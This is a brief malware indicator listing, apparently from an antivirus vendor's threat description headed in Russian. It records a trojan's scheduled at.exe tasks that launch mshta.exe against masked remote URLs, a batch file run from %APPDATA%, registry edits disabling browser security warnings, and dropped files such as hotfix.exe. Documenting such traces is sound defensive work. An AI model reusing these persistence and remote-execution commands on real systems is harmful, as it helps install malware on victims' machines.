Техническая информация
- %WINDIR%\Tasks\At1.job
- <SYSTEM32>\at.exe 00:21 /every:M,T,W,Th,F,S,Su mshta.exe http://fu#####nguinshow.com/sdad.php?kx############
- <SYSTEM32>\at.exe 01:21 /every:M,T,W,Th,F,S,Su mshta.exe http://fu#####nguinshow.com/sdad.php?kx############
- <SYSTEM32>\mshta.exe http://re###hsfk.com/inst.php?id#######
- <SYSTEM32>\cmd.exe /c ""%APPDATA%\dgfdgsdf.bat" "
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnPostRedirect' = '00000000'
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Internet Settings] 'WarnOnZoneCrossing' = '00000000'
- %APPDATA%\dgfdgsdf.bat
- %APPDATA%\hotfix.exe